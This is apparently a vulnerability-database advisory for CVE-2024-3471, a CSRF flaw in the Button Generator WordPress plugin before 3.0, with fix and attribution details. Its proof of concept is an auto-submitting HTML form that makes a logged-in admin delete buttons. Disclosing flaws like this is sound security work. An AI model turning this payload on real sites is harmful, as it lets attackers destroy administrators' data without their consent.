Button Generator < 3.0 – Button Deletion via CSRF | CVE 2024-3471 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when bulk deleting, which could allow attackers to make a logged in admin delete buttons via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://wps-test.ddev.site/wp-admin/admin.php?page=button-generation" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

Affects Plugins

button-generation

Fixed in 3.0

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

a3c282fb-81b8-48bf-8c18-8366ea8ad9af

Timeline

Publicly Published

2024-04-11 (about 1 months ago)

Added

2024-04-11 (about 1 months ago)

Last Updated

2024-04-11 (about 1 months ago)

Other

Published

Title

Published

2023-09-05

Title

wpCentral <= 1.5.7 - Settings Update via CSRF

Published

2014-08-01

Title

Knews 1.2.5 - Multilingual Newsletters Cross-Site Request Forgery

Published

2014-08-01

Title

Notices Ticker 5.0 - Cross-Site Request Forgery

Published

2014-08-01

Title

Wordpress 3.3.1 - Multiple Cross-Site Request Forgery (CSRF)

Published

2023-11-02

Title

Kadence WooCommerce Email Designer < 1.5.12 - CSRF